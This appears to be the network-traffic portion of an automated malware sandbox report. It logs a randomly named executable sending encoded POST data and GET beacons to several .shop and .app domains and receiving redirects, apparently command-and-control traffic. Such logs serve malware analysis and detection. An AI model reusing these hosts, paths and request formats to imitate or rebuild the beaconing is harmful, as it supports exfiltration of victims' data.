                                                                                                                                                                Data Ascii: nhl=GMdVftKtJN7z55NiCCYsUWFvKDlPx38T7YQhUl0gG56moP27+7Xk6JIvOrxp42gLEE5SkKm5N+5RIof6J1v+RfFp1XU5jEG8zp9rsMWKzw5iotN3cuJskJDu35puilvJRFHqaPqcOd0UrAixrg2UCt9jcY2Uw5xBcwYbjgaN6n5hgx7lNxuBtsIA7jai6LSXh/zr4c+Qm+x4teNKRuIX8Q6u+fWEwtCwpohTfO9R0E4QRMFJLW1znOioXhYtQBIEwbWWUfwTm1zTpuE2OWxzt5/4iff9hCVRolgkJ7FoL5T4uYb0b90AONctsGrMDFlZaR/e2E5/BkFp5+NNu+Mk11OBNo0QRNx+qP6Zz4qXNpXVozLmhvYnB9q/draziiuJH81TVujxenw+tVNf103XZf+nnM5ptdQqDoPscHrai6LRPDOIKpbxV33stuxFO9ivJMlBd9YOXqCijTN+QmyOEY+6do7MH9CXbHzwmtwzjnfgEv56UeiBCZ1BJZhzRH23ql3kE4sS/Zk34PycREGzfwoTepCDW20IrgGC1gfQ+wKRMBhAvmhTHkF7NyvssStEHqJGT5FWzU5mMKBgQ8KNbfbNAsaOvTyazournVOuI5vLHa9I3c6VopqqjPZX9s2HINc0XLmSbRY0SXS9CYNqW6Vp8u3flqp5hQK5iuAcL4SMjOCjFc7cWhNT17YoI/bpCa/YYeMcOiGf3XWsVMul+xKxtKvQFHu8nNKzsXXedq6ElhLdGwtaCq/f7tV6Qn/5LIPadzVT4cF69JgZzd5hI2ICzVplkmu+wKryuz1P78w7J91LwLi+bwRPOqRkLzaFl0Aw9H3kuiHUP8z0cKzJSvdeVw9AF+JeB6ax52jRVX
                                                                                                                                                                Oct 9, 2024 13:05:22.528984070 CEST2458OUTData Raw: 55 69 67 58 4f 58 65 42 37 30 2f 48 44 63 53 36 5a 72 31 61 71 52 2b 67 41 70 37 4e 50 4b 38 39 37 38 2b 31 6c 47 52 54 74 53 56 79 4a 30 2f 74 5a 6f 6c 2f 39 47 61 70 4a 65 71 63 78 51 45 6d 6c 6c 70 5a 69 7a 79 45 6e 36 6f 70 73 38 51 6e 52 6f
                                                                                                                                                                Data Ascii: UigXOXeB70/HDcS6Zr1aqR+gAp7NPK8978+1lGRTtSVyJ0/tZol/9GapJeqcxQEmllpZizyEn6ops8QnRoEa3hkbAaXcGRJckiZnvSP6JkMXFM+/4Af293639ukt4dO+OG76QTss2jOzBkf+AljB2Jk9WF0GBFj65sa5atHToTGARcJgBYzOFAUoV6Vqxak4C4+3dd6kyRb2iSNGXKkX8B1i5MOYqG6ILmzkBiB872dwC0YVV8x
                                                                                                                                                                Oct 9, 2024 13:05:22.683959007 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                content-type: text/plain
                                                                                                                                                                date: Wed, 09 Oct 2024 11:05:22 GMT
                                                                                                                                                                content-length: 0
                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                strict-transport-security: max-age=2592000
                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                expires: 631152000000
                                                                                                                                                                location: http://kx507945.shop


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                48192.168.11.304986954.67.42.145806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:25.222970009 CEST347OUTGET /7cee/?nhl=LO11cYuPDN+V6ulgbSQlbQhpKz952Uhe3dYdUk54a5ewrOC/uvvn5bRLfbUUmCEUWVML7qGOWOxZJM3qSQiiVpBT5y4/s1qW1sM6t7L30BdH3o50b80t3Z0=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.kx507981.shop
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:05:25.377521992 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                content-type: text/plain
                                                                                                                                                                date: Wed, 09 Oct 2024 11:05:25 GMT
                                                                                                                                                                content-length: 0
                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                strict-transport-security: max-age=2592000
                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                expires: 631152000000
                                                                                                                                                                location: http://kx507945.shop


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                49192.168.11.30498703.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:30.606779099 CEST604OUTPOST /77wx/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.teerra.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.teerra.shop
                                                                                                                                                                Referer: http://www.teerra.shop/77wx/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 32 73 79 61 4b 76 67 51 78 55 33 36 4a 74 4f 4b 62 55 6f 39 66 65 71 4c 43 58 55 4a 59 6b 66 44 53 33 6e 51 77 54 4f 48 6d 6d 4c 35 46 65 36 4b 74 33 57 7a 6e 32 74 33 36 67 37 42 56 50 41 2b 71 6e 6f 6e 41 51 4e 45 4b 56 4d 6e 63 77 6d 74 49 4d 73 6c 47 52 42 35 42 73 7a 78 4b 4c 6f 32 43 4e 37 4d 49 47 45 35 41 31 4f 77 47 78 74 57 35 77 68 33 6b 4f 49 49 67 6c 65 4a 36 71 61 58 69 47 6b 43 62 46 71 59 58 59 4a 42 79 45 6b 61 7a 73 48 50 76 75 4c 59 71 2b 52 70 41 63 66 59 45 6b 36 77 41 78 63 4c 46 49 50 42 73 72 4f 44 5a 59 6d 75 37 4c 36 65 32 30 79 44 6a 36 6a 76 63 67 3d 3d
                                                                                                                                                                Data Ascii: nhl=2syaKvgQxU36JtOKbUo9feqLCXUJYkfDS3nQwTOHmmL5Fe6Kt3Wzn2t36g7BVPA+qnonAQNEKVMncwmtIMslGRB5BszxKLo2CN7MIGE5A1OwGxtW5wh3kOIIgleJ6qaXiGkCbFqYXYJByEkazsHPvuLYq+RpAcfYEk6wAxcLFIPBsrODZYmu7L6e20yDj6jvcg==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                50192.168.11.30498713.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:33.247468948 CEST624OUTPOST /77wx/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.teerra.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.teerra.shop
                                                                                                                                                                Referer: http://www.teerra.shop/77wx/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 32 73 79 61 4b 76 67 51 78 55 33 36 4b 4d 65 4b 64 33 41 39 5a 2b 71 4d 48 58 55 4a 53 45 65 49 53 33 37 51 77 53 36 58 6e 56 2f 35 46 36 79 4b 6a 57 57 7a 6b 32 74 33 77 41 37 45 62 76 41 50 71 6d 55 76 41 56 74 45 4b 56 59 6e 63 31 61 74 49 2f 30 6d 48 42 42 37 59 63 7a 2f 45 72 6f 32 43 4e 37 4d 49 47 41 54 41 78 69 77 48 43 6c 57 2f 52 68 30 73 75 49 4c 6e 6c 65 4a 2b 71 62 2f 69 47 6b 73 62 45 6e 33 58 61 42 42 79 47 38 61 7a 35 37 49 32 65 4c 65 6c 65 51 33 4d 65 4f 7a 63 42 6d 46 50 6d 6f 7a 4b 4b 72 2f 74 38 2f 5a 45 62 53 73 6f 72 47 7a 71 31 66 72 68 34 69 30 42 68 54 31 73 76 6f 4f 52 42 4b 4c 65 4d 58 32 69 6f 4b 78 38 68 6b 3d
                                                                                                                                                                Data Ascii: nhl=2syaKvgQxU36KMeKd3A9Z+qMHXUJSEeIS37QwS6XnV/5F6yKjWWzk2t3wA7EbvAPqmUvAVtEKVYnc1atI/0mHBB7Ycz/Ero2CN7MIGATAxiwHClW/Rh0suILnleJ+qb/iGksbEn3XaBByG8az57I2eLeleQ3MeOzcBmFPmozKKr/t8/ZEbSsorGzq1frh4i0BhT1svoORBKLeMX2ioKx8hk=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                51192.168.11.30498723.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:35.897790909 CEST2578OUTPOST /77wx/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.teerra.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.teerra.shop
                                                                                                                                                                Referer: http://www.teerra.shop/77wx/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 32 73 79 61 4b 76 67 51 78 55 33 36 4b 4d 65 4b 64 33 41 39 5a 2b 71 4d 48 58 55 4a 53 45 65 49 53 33 37 51 77 53 36 58 6e 55 48 35 46 74 79 4b 6a 31 4f 7a 72 57 74 33 72 41 37 46 62 76 41 53 71 6d 4d 72 41 56 70 79 4b 57 67 6e 64 58 69 74 66 36 41 6d 4d 42 42 37 46 73 7a 79 4b 4c 70 69 43 4e 72 49 49 47 51 54 41 78 69 77 48 44 56 57 2f 41 68 30 75 75 49 49 67 6c 65 46 36 71 62 45 69 47 63 61 62 45 7a 64 58 5a 68 42 7a 78 77 61 7a 50 76 49 32 65 4c 65 74 2b 51 32 4d 65 43 79 63 41 44 4d 50 6a 55 4a 4b 36 50 2f 75 71 32 51 51 71 33 32 38 4b 79 68 76 56 54 33 6f 75 71 2b 4f 78 4b 56 6e 39 6b 33 55 56 69 34 58 61 66 2b 31 4e 53 56 2f 55 54 65 43 70 37 6a 59 68 6c 45 66 6b 4d 6a 4b 44 42 6a 2f 6d 41 7a 41 2f 4f 45 6b 42 56 31 48 62 76 35 68 6d 32 6f 54 63 72 57 6b 6b 72 6d 34 57 43 62 70 48 63 6b 70 4f 70 2b 30 53 6e 77 6a 57 46 47 50 4c 31 51 79 36 58 36 50 6c 35 48 48 68 78 74 37 59 4a 2f 73 6d 5a 5a 37 37 58 35 4a 37 77 4a 51 42 6f 64 4f 78 51 4d 34 32 55 30 51 6e 48 6f 67 33 71 62 64 4f [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=2syaKvgQxU36KMeKd3A9Z+qMHXUJSEeIS37QwS6XnUH5FtyKj1OzrWt3rA7FbvASqmMrAVpyKWgndXitf6AmMBB7FszyKLpiCNrIIGQTAxiwHDVW/Ah0uuIIgleF6qbEiGcabEzdXZhBzxwazPvI2eLet+Q2MeCycADMPjUJK6P/uq2QQq328KyhvVT3ouq+OxKVn9k3UVi4Xaf+1NSV/UTeCp7jYhlEfkMjKDBj/mAzA/OEkBV1Hbv5hm2oTcrWkkrm4WCbpHckpOp+0SnwjWFGPL1Qy6X6Pl5HHhxt7YJ/smZZ77X5J7wJQBodOxQM42U0QnHog3qbdOs8HeYJsRosJ3DbRGRc1xBL/Ja/yGD/2lEtEqcDq0txaml2S8R/hlQAPv0iQsnV/jATqevw7hoBpX2b3ddZ/xx+7NVL+nYwFeq7ULL1G0I1+PHoh8X0tkKHmotnKV5k0zOcu9ZwHEXXi0ucN3tEVG8NAUo3aqYLBK+aCkqYVPRh+tHtRHEJOq3PqDBI8sZlnlfHj6ylEmryEtjvuFjG0h+QEpKPZQtubC1BkUNsqEbNkXLCrb+JZGfSJynQsF43VNL/LELWgAGgOfs+fhwURCoOst3Bqv2LtJeMchw+flYf3khtm2bpP5Hkkq9n06bHQavGgvHt1vtMWbewDcY2vTO2KZsqQ73LTiLL4wSa85agp8sJQo8CtJXR0A/lZtUnDwF0lUaBOmj2Ke6+qYEtEbQZM0DmdFSbTMaCpxfNrBiEiOdXVNNh5udPlQjMyMqtqUZwxp9xkny3U5aRrRrZSxwsQQe8Vcg4pfMWeh5dB/rhsKwGM390GFQx8j0tX1JqhHQ8Vhp6IB7Ta3xsosHfriU4vnsmARZWbxA4Qbccj9y9y7gV25NEO3TcFmCVvZ7tCfGSsdSHKG+5L7imWevNOgso3u85D4arig3hj54Phj+FfiN8PlPQiJvfZgPozKF3TnGFE5TVolRWZSOf2G3iQPqC/E+mxADay8+s [TRUNCATED]
                                                                                                                                                                Oct 9, 2024 13:05:35.897815943 CEST1163OUTData Raw: 63 4b 4a 76 6f 42 68 62 2b 39 6e 64 66 49 6e 65 48 51 74 4e 76 50 73 71 6e 69 33 62 4c 6c 63 79 4a 56 6c 71 39 76 53 62 65 63 32 73 6c 73 36 64 68 6c 6e 33 32 4d 48 5a 36 54 78 46 45 61 41 32 76 4a 49 77 6f 79 53 2f 4c 79 37 6e 55 39 48 68 46 6b
                                                                                                                                                                Data Ascii: cKJvoBhb+9ndfIneHQtNvPsqni3bLlcyJVlq9vSbec2sls6dhln32MHZ6TxFEaA2vJIwoyS/Ly7nU9HhFkcbmXcQGRQnEN7LGSr5YSOOcleWzYYImrCYjBrqDE89BiLFOp5p6ZfYtUDBkhfqzM/QVYQceFJz/92/LzWQ7wMj205Krxcs9tjzvoieyM5zkOm20rn6b+DqhY1F4DF1IFtDg6YObJOw+NzAQ1zHcWmB4iruCUPuXij


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                52192.168.11.30498733.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:38.525166035 CEST345OUTGET /77wx/?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.teerra.shop
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:05:45.583575010 CEST399INHTTP/1.1 200 OK
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:05:45 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 259
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 68 6c 3d 37 75 61 36 4a 62 46 6c 68 31 57 4c 4a 6f 61 6f 4e 6c 41 73 52 66 75 49 46 32 73 54 4a 46 36 4c 63 54 58 62 2b 7a 79 48 70 32 53 56 52 74 53 64 31 79 6d 33 70 6d 31 4a 38 79 43 44 56 62 30 30 30 30 55 76 56 77 35 67 53 54 49 2f 56 67 69 2f 66 61 55 68 4d 67 55 64 48 76 72 63 50 72 6c 71 41 71 62 72 4f 52 64 78 59 69 47 4a 52 6e 39 38 31 43 6c 4f 7a 4d 34 3d 26 39 58 3d 45 76 4b 48 32 78 65 50 2d 44 70 50 33 30 37 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P"}</script></head></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                53192.168.11.304987884.32.84.3280
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:06:05.253164053 CEST616OUTPOST /51t8/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.agilizeimob.app
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.agilizeimob.app
                                                                                                                                                                Referer: http://www.agilizeimob.app/51t8/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 72 35 70 56 37 55 65 73 33 4e 58 75 69 57 43 56 4b 79 4d 62 4e 78 34 2f 5a 4c 69 67 41 52 4f 38 51 63 6f 34 6d 43 35 56 34 6a 43 38 61 70 36 44 45 6d 72 6d 4b 6c 62 69 61 53 70 6f 61 62 76 36 4f 52 38 62 76 49 50 67 31 56 70 59 33 6b 71 55 6b 4d 31 33 4b 47 6e 6d 59 5a 53 75 36 64 34 52 63 39 2b 57 6a 4d 79 4d 4d 4e 31 72 53 53 63 46 44 6c 53 72 56 69 66 36 4f 6b 64 65 51 4f 51 6e 39 6c 43 45 47 48 6f 35 43 6e 59 57 54 49 6c 79 79 7a 2b 32 38 59 55 71 57 6d 65 51 49 75 61 52 30 68 39 67 69 6b 65 32 54 79 75 68 34 4c 33 4f 62 48 55 71 6e 70 39 7a 63 58 41 6a 47 56 2b 37 70 41 3d 3d
                                                                                                                                                                Data Ascii: nhl=r5pV7Ues3NXuiWCVKyMbNx4/ZLigARO8Qco4mC5V4jC8ap6DEmrmKlbiaSpoabv6OR8bvIPg1VpY3kqUkM13KGnmYZSu6d4Rc9+WjMyMMN1rSScFDlSrVif6OkdeQOQn9lCEGHo5CnYWTIlyyz+28YUqWmeQIuaR0h9gike2Tyuh4L3ObHUqnp9zcXAjGV+7pA==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                54192.168.11.304987984.32.84.3280
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:06:07.898647070 CEST636OUTPOST /51t8/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.agilizeimob.app
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.agilizeimob.app
                                                                                                                                                                Referer: http://www.agilizeimob.app/51t8/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 72 35 70 56 37 55 65 73 33 4e 58 75 67 7a 4b 56 5a 46 34 62 64 68 34 77 56 72 69 67 4b 78 4f 77 51 63 6b 34 6d 44 4e 46 34 52 6d 38 62 4a 71 44 4c 44 48 6d 4e 6c 62 69 43 43 70 30 55 37 75 32 4f 52 67 54 76 4b 4c 67 31 56 74 59 33 6c 61 55 6b 2f 64 77 4c 57 6e 67 45 5a 53 67 30 39 34 52 63 39 2b 57 6a 4d 4f 6d 4d 4e 64 72 52 6a 73 46 44 42 47 30 66 43 66 37 59 55 64 65 61 75 51 6a 39 6c 43 6d 47 47 31 78 43 6a 6f 57 54 4e 42 79 7a 68 47 70 7a 59 55 6f 53 6d 66 77 45 4d 2f 44 79 43 64 70 74 31 36 32 52 42 53 6f 77 38 47 55 47 45 67 6f 30 4a 42 65 41 57 74 4c 45 58 2f 67 30 42 4a 73 4e 2f 34 6b 78 35 62 61 56 6c 46 46 6a 61 65 70 76 59 41 3d
                                                                                                                                                                Data Ascii: nhl=r5pV7Ues3NXugzKVZF4bdh4wVrigKxOwQck4mDNF4Rm8bJqDLDHmNlbiCCp0U7u2ORgTvKLg1VtY3laUk/dwLWngEZSg094Rc9+WjMOmMNdrRjsFDBG0fCf7YUdeauQj9lCmGG1xCjoWTNByzhGpzYUoSmfwEM/DyCdpt162RBSow8GUGEgo0JBeAWtLEX/g0BJsN/4kx5baVlFFjaepvYA=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                55192.168.11.304988084.32.84.3280
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:06:10.537930965 CEST2578OUTPOST /51t8/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.agilizeimob.app
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.agilizeimob.app
                                                                                                                                                                Referer: http://www.agilizeimob.app/51t8/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 72 35 70 56 37 55 65 73 33 4e 58 75 67 7a 4b 56 5a 46 34 62 64 68 34 77 56 72 69 67 4b 78 4f 77 51 63 6b 34 6d 44 4e 46 34 52 75 38 61 36 53 44 45 45 7a 6d 4d 6c 62 69 63 53 70 33 55 37 75 37 4f 52 34 58 76 4b 48 57 31 57 46 59 32 48 53 55 69 4b 68 77 46 57 6e 67 50 35 53 68 36 64 34 41 63 38 53 53 6a 4d 2b 6d 4d 4e 64 72 52 67 6b 46 54 46 53 30 5a 43 66 36 4f 6b 64 61 51 4f 51 4c 39 6d 79 4d 47 46 59 54 43 6e 51 57 54 37 64 79 7a 53 2b 70 7a 59 55 6f 66 47 66 78 45 4d 44 65 79 43 31 44 74 30 79 49 52 78 6d 6f 30 4e 6e 53 52 47 6b 6e 32 4a 4a 4f 64 58 39 54 45 30 37 54 33 7a 4a 72 41 4e 38 71 6d 4a 50 31 5a 77 68 72 36 62 4c 70 30 4f 2b 68 47 66 74 31 6a 78 65 55 68 37 52 38 38 48 4f 76 4e 7a 35 33 66 32 38 63 6e 58 71 63 77 62 6f 56 75 47 78 55 77 6c 55 4e 5a 64 38 76 6b 76 51 39 78 7a 41 53 52 33 53 4a 6b 6c 5a 36 66 6a 59 4d 49 32 38 4c 49 58 36 4e 30 5a 48 48 74 6f 52 61 44 47 65 38 2b 70 73 44 69 6b 76 4b 70 42 4a 42 78 65 5a 6e 79 35 41 71 6b 67 4d 56 33 48 37 2b 69 4e 32 52 57 42 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=r5pV7Ues3NXugzKVZF4bdh4wVrigKxOwQck4mDNF4Ru8a6SDEEzmMlbicSp3U7u7OR4XvKHW1WFY2HSUiKhwFWngP5Sh6d4Ac8SSjM+mMNdrRgkFTFS0ZCf6OkdaQOQL9myMGFYTCnQWT7dyzS+pzYUofGfxEMDeyC1Dt0yIRxmo0NnSRGkn2JJOdX9TE07T3zJrAN8qmJP1Zwhr6bLp0O+hGft1jxeUh7R88HOvNz53f28cnXqcwboVuGxUwlUNZd8vkvQ9xzASR3SJklZ6fjYMI28LIX6N0ZHHtoRaDGe8+psDikvKpBJBxeZny5AqkgMV3H7+iN2RWBaRhvFAAW5deeSgLPkmYAc4mEYHt+jVho4TcicVifw5dEluhrPhWyQnEdk7j5fPnKT8CT/weV2sUrGIsoAhOuN0Eo+W9McFDMGsYltW/KVg3GNE1B2UoyEXh/k49TycEa1RvoxGNEmvBte7CzEBDHAEHnQ4n7oVW3Y6izlnf2XCd3rOou3QwU/AicvW4icOmtMTjTXb9E5nTn1OBmnZKOox84Oken3UlNkmL0UemGnW8AVVxqnkbsQViBAi2h8z2PT3qRXoyWQU6Kz8II9/enQCeRwV0tBq35Z/xgpbpxmU4Ecx9al5bkyZn3wKA9s0EsjeA+04fjeK64bb8pAIjyZXbxbAtADijT0B4JNem0+pjRloZUv50gvqO1FZ25fe0KbXP+83zo3ErGoQlrEVo+ZbWX4lSieDk9U8Q5JQCDyfOrShPfOue6kxrFw7xLocBrKOrHhmoyBtyGoz5wyyDgsTNV1TtKfk3u8aRCzG7IiRkZ8VPgn5rSE9kGYuRhJqXk6JEjpHmwTrkmK8WXcBxOBtXi0DEbG4FbCgcD5iWEw455rzlqCQxTR0GWG00BYPhkD+nFtib011IkEjo0kCJ1Y8JyRUV/R8Tcge36gIOKU4eyYqiVcUdIn5c5fff1FlxrG8sXfY/PkpyvuYvmaNCMGrGadWm3z78yl6 [TRUNCATED]
                                                                                                                                                                Oct 9, 2024 13:06:10.537978888 CEST1175OUTData Raw: 43 6b 5a 77 56 77 52 45 66 39 55 6b 53 6b 67 58 59 2b 68 58 6d 42 44 4a 37 51 46 41 47 6b 75 57 6c 51 64 6e 48 55 78 68 4a 73 69 36 63 66 79 6e 66 58 34 65 65 45 65 59 62 6a 75 2b 59 68 59 4b 77 6e 47 66 41 6d 39 35 6f 70 30 68 6b 74 7a 71 61 42
                                                                                                                                                                Data Ascii: CkZwVwREf9UkSkgXY+hXmBDJ7QFAGkuWlQdnHUxhJsi6cfynfX4eeEeYbju+YhYKwnGfAm95op0hktzqaB7tPa0llkmemzOGLtpA/hejV3Qe4y7kgqeSZmV+5kvZ3KZ6K/ZjymEP2rTHYoYw+9IUpYQh1XGUWVWJcfEVQwQN9bNtvlyCNtcl8+YXD2bn96RMTKTxHgyNEVYPO4wtV84Jy0nxNL/pJPCoryZGTPbzV5fLvgSLXWH


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                56192.168.11.304988184.32.84.3280
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:06:13.173218966 CEST349OUTGET /51t8/?nhl=m7B14gWZ3tTp+Si7ZmYNMzAQVPiIRhKeZLAtkzFkwSvyWpqHTy62LwfcTz9vRoaiRTwb/KbEqTho7SSr6qx+JXj6A7Si0P86LNCZt8nEBft2KH0FBAqzAzY=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.agilizeimob.app
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:06:13.273905993 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                Server: hcdn
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:06:13 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 10072
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                x-hcdn-request-id: 2f359f3381bea2ee18e0d521e662e1fd-bos-edge3
                                                                                                                                                                Expires: Wed, 09 Oct 2024 11:06:12 GMT
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Accept-Ranges: bytes
